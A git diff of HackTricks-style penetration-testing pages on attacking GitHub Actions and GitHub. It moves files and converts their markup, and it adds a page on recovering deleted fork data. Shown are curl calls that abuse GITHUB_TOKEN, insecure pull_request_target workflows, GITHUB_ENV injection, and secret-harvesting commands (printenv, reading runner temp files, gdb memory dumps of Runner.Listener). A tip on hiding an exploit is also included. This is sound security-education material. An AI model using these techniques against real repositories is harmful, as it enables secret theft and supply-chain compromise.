privileges** to gain unauthorized access to external platforms, such as AWS and GCP. +- **Compromise deployments** and other **artifacts**. + - If the pipeline deploys or stores assets, you could alter the final product, enabling a supply chain attack. +- **Execute code in custom workers** to abuse computing power and pivot to other systems. +- **Overwrite repository code**, depending on the permissions associated with the `GITHUB_TOKEN`. -## GITHUB\_TOKEN +## GITHUB_TOKEN This "**secret**" (coming from `${{ secrets.GITHUB_TOKEN }}` and `${{ github.token }}`) is given when the admin enables this option: -
+
This token is the same one a **Github Application will use**, so it can access the same endpoints: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps) -{% hint style="warning" %} -Github should release a [**flow**](https://github.com/github/roadmap/issues/74) that **allows cross-repository** access within GitHub, so a repo can access other internal repos using the `GITHUB_TOKEN`. -{% endhint %} +> [!WARNING] +> Github should release a [**flow**](https://github.com/github/roadmap/issues/74) that **allows cross-repository** access within GitHub, so a repo can access other internal repos using the `GITHUB_TOKEN`. -You can see the possible **permissions** of this token in: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github\_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token) +You can see the possible **permissions** of this token in: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token) Note that the token **expires after the job has completed**.\ These tokens looks like this: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7` Some interesting things you can do with this token: -{% tabs %} -{% tab title="Merge PR" %} +{{#tabs }} +{{#tab name="Merge PR" }} + ```bash # Merge PR curl -X PUT \ https://api.github.com/repos///pulls//merge \ -H "Accept: application/vnd.github.v3+json" \ --header "authorization: Bearer $GITHUB_TOKEN" \ - --header 'content-type: application/json' \ - -d '{"commit_title":"commit_title"}' + --header "content-type: application/json" \ + -d "{\"commit_title\":\"commit_title\"}" ``` -{% endtab %} -{% tab title="Approve PR" %} +{{#endtab }} +{{#tab name="Approve PR" }} + ```bash # Approve a PR curl -X POST \ @@ -81,9 +69,10 @@ curl -X POST \ --header 'content-type: application/json' \ -d '{"event":"APPROVE"}' ``` -{% endtab %} -{% tab title="Create PR" %} +{{#endtab }} +{{#tab name="Create PR" }} + ```bash # Create a PR curl -X POST \ @@ -93,12 +82,12 @@ curl -X POST \ https://api.github.com/repos///pulls \ -d '{"head":"","base":"master", "title":"title"}' ``` -{% endtab %} -{% endtabs %} -{% hint style="danger" %} -Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization. -{% endhint %} +{{#endtab }} +{{#endtabs }} + +> [!CAUTION] +> Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization.
@@ -110,11 +99,11 @@ on: workflow_dispatch: # Launch manually pull_request: #Run it when a PR is created to a branch branches: - - '**' + - "**" push: # Run it when a push is made to a branch branches: - - '**' -jobs: + - "**" +jobs: List_env: runs-on: ubuntu-latest steps: @@ -138,11 +127,11 @@ on: workflow_dispatch: # Launch manually pull_request: #Run it when a PR is created to a branch branches: - - '**' + - "**" push: # Run it when a push is made to a branch branches: - - '**' -jobs: + - "**" +jobs: create_pull_request: runs-on: ubuntu-latest steps: @@ -157,15 +146,14 @@ jobs: It's possible to check the permissions given to a Github Token in other users repositories **checking the logs** of the actions: -
+
## Allowed Execution -{% hint style="info" %} -This would be the easiest way to compromise Github actions, as this case suppose that you have access to **create a new repo in the organization**, or have **write privileges over a repository**. - -If you are in this scenario you can just check the [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action). -{% endhint %} +> [!NOTE] +> This would be the easiest way to compromise Github actions, as this case suppose that you have access to **create a new repo in the organization**, or have **write privileges over a repository**. +> +> If you are in this scenario you can just check the [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action). ### Execution from Repo Creation @@ -186,29 +174,26 @@ on: push: # Run it when a push is made to a branch branches: - current_branch_name - # Use '**' instead of a branh name to trigger the action in all the cranches ``` -*** +--- ## Forked Execution -{% hint style="info" %} -There are different triggers that could allow an attacker to **execute a Github Action of another repository**. If those triggerable actions are poorly configured, an attacker could be able to compromise them. -{% endhint %} +> [!NOTE] +> There are different triggers that could allow an attacker to **execute a Github Action of another repository**. If those triggerable actions are poorly configured, an attacker could be able to compromise them. ### `pull_request` The workflow trigger **`pull_request`** will execute the workflow every time a pull request is received with some exceptions: by default if it's the **first time** you are **collaborating**, some **maintainer** will need to **approve** the **run** of the workflow: -
+
-{% hint style="info" %} -As the **default limitation** is for **first-time** contributors, you could contribute **fixing a valid bug/typo** and then send **other PRs to abuse your new `pull_request` privileges**. - -**I tested this and it doesn't work**: ~~Another option would be to create an account with the name of someone that contributed to the project and deleted his account.~~ -{% endhint %} +> [!NOTE] +> As the **default limitation** is for **first-time** contributors, you could contribute **fixing a valid bug/typo** and then send **other PRs to abuse your new `pull_request` privileges**. +> +> **I tested this and it doesn't work**: ~~Another option would be to create an account with the name of someone that contributed to the project and deleted his account.~~ Moreover, by default **prevents write permissions** and **secrets access** to the target repository as mentioned in the [**docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories): @@ -216,9 +201,8 @@ Moreover, by default **prevents write permissions** and **secrets access** to th An attacker could modify the definition of the Github Action in order to execute arbitrary things and append arbitrary actions. However, he won't be able to steal secrets or overwrite the repo because of the mentioned limitations. -{% hint style="danger" %} -**Yes, if the attacker change in the PR the github action that will be triggered, his Github Action will be the one used and not the one from the origin repo!** -{% endhint %} +> [!CAUTION] +> **Yes, if the attacker change in the PR the github action that will be triggered, his Github Action will be the one used and not the one from the origin repo!** As the attacker also controls the code being executed, even if there aren't secrets or write permissions on the `GITHUB_TOKEN` an attacker could for example **upload malicious artifacts**. @@ -235,7 +219,7 @@ An this one will have **access to secrets**. ### `workflow_run` -The [**workflow\_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) trigger allows to run a workflow from a different one when it's `completed`, `requested` or `in_progress`. +The [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) trigger allows to run a workflow from a different one when it's `completed`, `requested` or `in_progress`. In this example, a workflow is configured to run after the separate "Run Tests" workflow completes: @@ -256,7 +240,7 @@ The second one consist on **passing** an **artifact** from the **untrusted** cod TODO -TODO: Check if when executed from a pull\_request the used/downloaded code if the one from the origin or from the forked PR +TODO: Check if when executed from a pull_request the used/downloaded code if the one from the origin or from the forked PR ## Abusing Forked Execution @@ -268,9 +252,8 @@ In the case of **`pull_request`,** the workflow is going to be executed in the * In case of a workflow using **`pull_request_target` or `workflow_run`** that depends on a workflow that can be triggered from **`pull_request_target` or `pull_request`** the code from the original repo will be executed, so the **attacker cannot control the executed code**. -{% hint style="danger" %} -However, if the **action** has an **explicit PR checkou**t that will **get the code from the PR** (and not from base), it will use the attackers controlled code. For example (check line 12 where the PR code is downloaded): -{% endhint %} +> [!CAUTION] +> However, if the **action** has an **explicit PR checkou**t that will **get the code from the PR** (and not from base), it will use the attackers controlled code. For example (check line 12 where the PR code is downloaded): 
# INSECURE. Provided as an example only.
 on:
@@ -302,27 +285,26 @@ jobs:
 
 The potentially **untrusted code is being run during `npm install` or `npm build`** as the build scripts and referenced **packages are controlled by the author of the PR**.
 
-{% hint style="warning" %}
-A github dork to search for vulnerable actions is: `event.pull_request pull_request_target extension:yml` however, there are different ways to configure the jobs to be executed securely even if the action is configured insecurely (like using conditionals about who is the actor generating the PR).
-{% endhint %}
+> [!WARNING]
+> A github dork to search for vulnerable actions is: `event.pull_request pull_request_target extension:yml` however, there are different ways to configure the jobs to be executed securely even if the action is configured insecurely (like using conditionals about who is the actor generating the PR).
 
 ### Context Script Injections 
 
 Note that there are certain [**github contexts**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) whose values are **controlled** by the **user** creating the PR. If the github action is using that **data to execute anything**, it could lead to **arbitrary code execution:**
 
-{% content-ref url="gh-actions-context-script-injections.md" %}
-[gh-actions-context-script-injections.md](gh-actions-context-script-injections.md)
-{% endcontent-ref %}
+{{#ref}}
+gh-actions-context-script-injections.md
+{{#endref}}
 
-### **GITHUB\_ENV Script Injection** 
+### **GITHUB_ENV Script Injection** 
 
 From the docs: You can make an **environment variable available to any subsequent steps** in a workflow job by defining or updating the environment variable and writing this to the **`GITHUB_ENV`** environment file.
 
-If an attacker could **inject any value** inside this **env** variable, he could inject env variables that could execute code in following steps such as **LD\_PRELOAD** or **NODE\_OPTIONS**.
+If an attacker could **inject any value** inside this **env** variable, he could inject env variables that could execute code in following steps such as **LD_PRELOAD** or **NODE_OPTIONS**.
 
 For example ([**this**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) and [**this**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), imagine a workflow that is trusting an uploaded artifact to store its content inside **`GITHUB_ENV`** env variable. An attacker could upload something like this to compromise it:
 
-

+

 
 ### Vulnerable Third Party Github Actions
 
@@ -336,25 +318,25 @@ Example of vulnerable workflow:
 
 ```yaml
 on:
-    workflow_run:
-        workflows: ["some workflow"]
-        types:
-            - completed
-            
+  workflow_run:
+    workflows: ["some workflow"]
+    types:
+      - completed
+
 jobs:
-    success:
-        runs-on: ubuntu-latest
-        steps:
-            - uses: actions/checkout@v2
-            - name: download artifact
-              uses: dawidd6/action-download-artifact
-              with:
-                workflow: ${{ github.event.workflow_run.workflow_id }}
-                name: artifact
-            - run: python ./script.py
-              with:
-                  name: artifact
-                  path: ./script.py
+  success:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v2
+      - name: download artifact
+        uses: dawidd6/action-download-artifact
+        with:
+          workflow: ${{ github.event.workflow_run.workflow_id }}
+          name: artifact
+      - run: python ./script.py
+        with:
+          name: artifact
+          path: ./script.py
 ```
 
 This could be attacked with this workflow:
@@ -374,7 +356,7 @@ jobs:
                 path: ./script.py
 ```
 
-***
+---
 
 ## Other External Access
 
@@ -382,37 +364,35 @@ jobs:
 
 If an account changes it's name another user could register an account with that name after some time. If a repository had **less than 100 stars previously to the change of nam**e, Github will allow the new register user with the same name to create a **repository with the same name** as the one deleted.
 
-{% hint style="danger" %}
-So if an action is using a repo from a non-existent account, it's still possible that an attacker could create that account and compromise the action.
-{% endhint %}
+> [!CAUTION]
+> So if an action is using a repo from a non-existent account, it's still possible that an attacker could create that account and compromise the action.
 
 If other repositories where using **dependencies from this user repos**, an attacker will be able to hijack them Here you have a more complete explanation: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
 
-***
+---
 
 ## Repo Pivoting
 
-{% hint style="info" %}
-In this section we will talk about techniques that would allow to **pivot from one repo to another** supposing we have some kind of access on the first one (check the previous section).
-{% endhint %}
+> [!NOTE]
+> In this section we will talk about techniques that would allow to **pivot from one repo to another** supposing we have some kind of access on the first one (check the previous section).
 
 ### Cache Poisoning
 
 A cache is maintained between **wokflow runs in the same branch**. Which means that if an attacker **compromise** a **package** that is then stored in the cache and **downloaded** and executed by a **more privileged** workflow he will be able to **compromise** also that workflow.
 
-{% content-ref url="gh-actions-cache-poisoning.md" %}
-[gh-actions-cache-poisoning.md](gh-actions-cache-poisoning.md)
-{% endcontent-ref %}
+{{#ref}}
+gh-actions-cache-poisoning.md
+{{#endref}}
 
 ### Artifact Poisoning
 
 Workflows could use **artifacts from other workflows and even repos**, if an attacker manages to **compromise** the Github Action that **uploads an artifact** that is later used by another workflow he could **compromise the other workflows**:
 
-{% content-ref url="gh-actions-artifact-poisoning.md" %}
-[gh-actions-artifact-poisoning.md](gh-actions-artifact-poisoning.md)
-{% endcontent-ref %}
+{{#ref}}
+gh-actions-artifact-poisoning.md
+{{#endref}}
 
-***
+---
 
 ## Post Exploitation from an Action
 
@@ -420,19 +400,19 @@ Workflows could use **artifacts from other workflows and even repos**, if an att
 
 Check the following pages:
 
-{% content-ref url="../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md" %}
-[aws-federation-abuse.md](../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md)
-{% endcontent-ref %}
+{{#ref}}
+../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
+{{#endref}}
 
-{% content-ref url="../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md" %}
-[gcp-federation-abuse.md](../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md)
-{% endcontent-ref %}
+{{#ref}}
+../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md
+{{#endref}}
 
 ### Accessing secrets 
 
 If you are injecting content into a script it's interesting to know how you can access secrets:
 
-* If the secret or token is set to an **environment variable**, it can be directly accessed through the environment using **`printenv`**.
+- If the secret or token is set to an **environment variable**, it can be directly accessed through the environment using **`printenv`**.
 
 

 
@@ -448,7 +428,7 @@ on:
   push: # Run it when a push is made to a branch
     branches:
       - '**'
-jobs:     
+jobs:
   List_env:
     runs-on: ubuntu-latest
     steps:
@@ -473,11 +453,11 @@ on:
   workflow_dispatch: # Launch manually
   pull_request: #Run it when a PR is created to a branch
     branches:
-      - '**'
+      - "**"
   push: # Run it when a push is made to a branch
     branches:
-      - '**'
-jobs:     
+      - "**"
+jobs:
   create_pull_request:
     runs-on: ubuntu-latest
     steps:
@@ -490,21 +470,21 @@ jobs:
 
 

 
-* If the secret is used **directly in an expression**, the generated shell script is stored **on-disk** and is accessible.
-  * ```bash
+- If the secret is used **directly in an expression**, the generated shell script is stored **on-disk** and is accessible.
+  - ```bash
     cat /home/runner/work/_temp/*
     ```
-* For a JavaScript actions the secrets and sent through environment variables
-  * ```bash
+- For a JavaScript actions the secrets and sent through environment variables
+  - ```bash
     ps axe | grep node
     ```
-*   For a **custom action**, the risk can vary depending on how a program is using the secret it obtained from the **argument**:
+- For a **custom action**, the risk can vary depending on how a program is using the secret it obtained from the **argument**:
 
-    ```yaml
-    uses: fakeaction/publish@v3
-    with:
-        key: ${{ secrets.PUBLISH_KEY }}
-    ```
+  ```yaml
+  uses: fakeaction/publish@v3
+  with:
+    key: ${{ secrets.PUBLISH_KEY }}
+  ```
 
 ### Abusing Self-hosted runners
 
@@ -514,12 +494,10 @@ The way to find which **Github Actions are being executed in non-github infrastr
 
 In self-hosted runners it's also possible to obtain the **secrets from the \_Runner.Listener**\_\*\* process\*\* which will contain all the secrets of the workflows at any step by dumping its memory:
 
-{% code overflow="wrap" %}
 ```bash
 sudo apt-get install -y gdb
 sudo gcore -o k.dump "$(ps ax | grep 'Runner.Listener' | head -n 1 | awk '{ print $1 }')"
 ```
-{% endcode %}
 
 Check [**this post for more information**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/).
 
@@ -574,7 +552,9 @@ docker pull ghcr.io//:
 
 Then, the user could search for **leaked secrets in the Docker image layers:**
 
-{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics" %}
+{{#ref}}
+https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics
+{{#endref}}
 
 ### Sensitive info in Github Actions logs
 
@@ -586,30 +566,16 @@ Even if **Github** try to **detect secret values** in the actions logs and **avo
 
 An organization in GitHub is very proactive in reporting accounts to GitHub. All you need to do is share “some stuff” in Issue and they will make sure your account is suspended in 12 hours :p and there you have, made your exploit invisible on github.
 
-{% hint style="warning" %}
-The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed.
-{% endhint %}
+> [!WARNING]
+> The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed.
 
 ## Tools
 
 The following tools are useful to find Github Action workflows and even find vulnerable ones:
 
-* [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven)
-* [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato)
-* [https://github.com/AdnaneKhan/Gato-X](https://github.com/AdnaneKhan/Gato-X)
-* [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda)
+- [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven)
+- [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato)
+- [https://github.com/AdnaneKhan/Gato-X](https://github.com/AdnaneKhan/Gato-X)
+- [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
similarity index 100%
rename from pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
rename to src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
diff --git a/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
similarity index 100%
rename from pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
rename to src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
diff --git a/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
similarity index 100%
rename from pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
rename to src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
diff --git a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
new file mode 100644
index 000000000..879983075
--- /dev/null
+++ b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
@@ -0,0 +1,56 @@
+# Accessible Deleted Data in Github
+
+{{#include ../../banners/hacktricks-training.md}}
+
+This ways to access data from Github that was supposedly deleted was [**reported in this blog post**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github).
+
+## Accessing Deleted Fork Data
+
+1. You fork a public repository
+2. You commit code to your fork
+3. You delete your fork
+
+> [!CAUTION]
+> The data commited in the deleted fork is still accessible.
+
+## Accessing Deleted Repo Data
+
+1. You have a public repo on GitHub.
+2. A user forks your repo.
+3. You commit data after they fork it (and they never sync their fork with your updates).
+4. You delete the entire repo.
+
+> [!CAUTION]
+> Even if you deleted your repo, all the changes made to it are still accessible through the forks.
+
+## Accessing Private Repo Data
+
+1. You create a private repo that will eventually be made public.
+2. You create a private, internal version of that repo (via forking) and commit additional code for features that you’re not going to make public.
+3. You make your “upstream” repository public and keep your fork private.
+
+> [!CAUTION]
+> It's possible to access al the data pushed to the internal fork in the time between the internal fork was created and the public version was made public.
+
+## How to discover commits from deleted/hidden forks
+
+The same blog post propose 2 options:
+
+### Directly accessing the commit
+
+If the commit ID (sha-1) value is known it's possible to access it in `https://github.com///commit/`
+
+### Brute-forcing short SHA-1 values
+
+It's the same to access both of these:
+
+- [https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14](https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14)
+- [https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463](https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463)
+
+And the latest one use a short sha-1 that is bruteforceable.
+
+## References
+
+- [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github)
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-ci-cd/github-security/basic-github-information.md b/src/pentesting-ci-cd/github-security/basic-github-information.md
similarity index 62%
rename from pentesting-ci-cd/github-security/basic-github-information.md
rename to src/pentesting-ci-cd/github-security/basic-github-information.md
index a4cabaef3..1fe92dd5c 100644
--- a/pentesting-ci-cd/github-security/basic-github-information.md
+++ b/src/pentesting-ci-cd/github-security/basic-github-information.md
@@ -1,19 +1,6 @@
 # Basic Github Information
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 
 ## Basic Structure
 
@@ -29,58 +16,58 @@ And finally **repositories may have special protection mechanisms**.
 
 ### Enterprise Roles
 
-* **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository
-* **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**.
+- **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository
+- **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**.
 
 ### Organization Roles
 
 In an organisation users can have different roles:
 
-* **Organization owners**: Organization owners have **complete administrative access to your organization**. This role should be limited, but to no less than two people, in your organization.
-* **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**.
-* **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information.
-* **Security Managers**: It's a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization.
-  * If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization.
-* **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions.
-* **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization.
+- **Organization owners**: Organization owners have **complete administrative access to your organization**. This role should be limited, but to no less than two people, in your organization.
+- **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**.
+- **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information.
+- **Security Managers**: It's a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization.
+  - If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization.
+- **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions.
+- **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization.
 
 You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
 
 ### Members Privileges
 
-In _https://github.com/organizations/\/settings/member\_privileges_ you can see the **permissions users will have just for being part of the organisation**.
+In _https://github.com/organizations/\/settings/member_privileges_ you can see the **permissions users will have just for being part of the organisation**.
 
 The settings here configured will indicate the following permissions of members of the organisation:
 
-* Be admin, writer, reader or no permission over all the organisation repos.
-* If members can create private, internal or public repositories.
-* If forking of repositories is possible
-* If it's possible to invite outside collaborators
-* If public or private sites can be published
-* The permissions admins has over the repositories
-* If members can create new teams
+- Be admin, writer, reader or no permission over all the organisation repos.
+- If members can create private, internal or public repositories.
+- If forking of repositories is possible
+- If it's possible to invite outside collaborators
+- If public or private sites can be published
+- The permissions admins has over the repositories
+- If members can create new teams
 
 ### Repository Roles
 
 By default repository roles are created:
 
-* **Read**: Recommended for **non-code contributors** who want to view or discuss your project
-* **Triage**: Recommended for **contributors who need to proactively manage issues and pull requests** without write access
-* **Write**: Recommended for contributors who **actively push to your project**
-* **Maintain**: Recommended for **project managers who need to manage the repository** without access to sensitive or destructive actions
-* **Admin**: Recommended for people who need **full access to the project**, including sensitive and destructive actions like managing security or deleting a repository
+- **Read**: Recommended for **non-code contributors** who want to view or discuss your project
+- **Triage**: Recommended for **contributors who need to proactively manage issues and pull requests** without write access
+- **Write**: Recommended for contributors who **actively push to your project**
+- **Maintain**: Recommended for **project managers who need to manage the repository** without access to sensitive or destructive actions
+- **Admin**: Recommended for people who need **full access to the project**, including sensitive and destructive actions like managing security or deleting a repository
 
 You can **compare the permissions** of each role in this table [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role)
 
-You can also **create your own roles** in _https://github.com/organizations/\/settings/roles_
+You can also **create your own roles** in _https://github.com/organizations/\/settings/roles_
 
 ### Teams
 
-You can **list the teams created in an organization** in _https://github.com/orgs/\/teams_. Note that to see the teams which are children of other teams you need to access each parent team.
+You can **list the teams created in an organization** in _https://github.com/orgs/\/teams_. Note that to see the teams which are children of other teams you need to access each parent team.
 
 ### Users
 
-The users of an organization can be **listed** in _https://github.com/orgs/\/people._
+The users of an organization can be **listed** in _https://github.com/orgs/\/people._
 
 In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**.
 
@@ -108,40 +95,40 @@ You can generate personal access token to **give an application access to your a
 
 Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms.
 
-* You can **create** your own **Oauth applications** in [https://github.com/settings/developers](https://github.com/settings/developers)
-* You can see all the **Oauth applications that has access to your account** in [https://github.com/settings/applications](https://github.com/settings/applications)
-* You can see the **scopes that Oauth Apps can ask for** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps)
-* You can see third party access of applications in an **organization** in _https://github.com/organizations/\/settings/oauth\_application\_policy_
+- You can **create** your own **Oauth applications** in [https://github.com/settings/developers](https://github.com/settings/developers)
+- You can see all the **Oauth applications that has access to your account** in [https://github.com/settings/applications](https://github.com/settings/applications)
+- You can see the **scopes that Oauth Apps can ask for** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps)
+- You can see third party access of applications in an **organization** in _https://github.com/organizations/\/settings/oauth_application_policy_
 
 Some **security recommendations**:
 
-* An **OAuth App** should always **act as the authenticated GitHub user across all of GitHub** (for example, when providing user notifications) and with access only to the specified scopes..
-* An OAuth App can be used as an identity provider by enabling a "Login with GitHub" for the authenticated user.
-* **Don't** build an **OAuth App** if you want your application to act on a **single repository**. With the `repo` OAuth scope, OAuth Apps can **act on \_all**\_\*\* of the authenticated user's repositorie\*\*s.
-* **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it.
-* **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps).
+- An **OAuth App** should always **act as the authenticated GitHub user across all of GitHub** (for example, when providing user notifications) and with access only to the specified scopes..
+- An OAuth App can be used as an identity provider by enabling a "Login with GitHub" for the authenticated user.
+- **Don't** build an **OAuth App** if you want your application to act on a **single repository**. With the `repo` OAuth scope, OAuth Apps can **act on \_all**\_\*\* of the authenticated user's repositorie\*\*s.
+- **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it.
+- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps).
 
 ### Github Applications
 
 Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to.
 
-* To install a GitHub App, you must be an **organisation owner or have admin permissions** in a repository.
-* The GitHub App should **connect to a personal account or an organisation**.
-* You can create your own Github application in [https://github.com/settings/apps](https://github.com/settings/apps)
-* You can see all the **Github applications that has access to your account** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations)
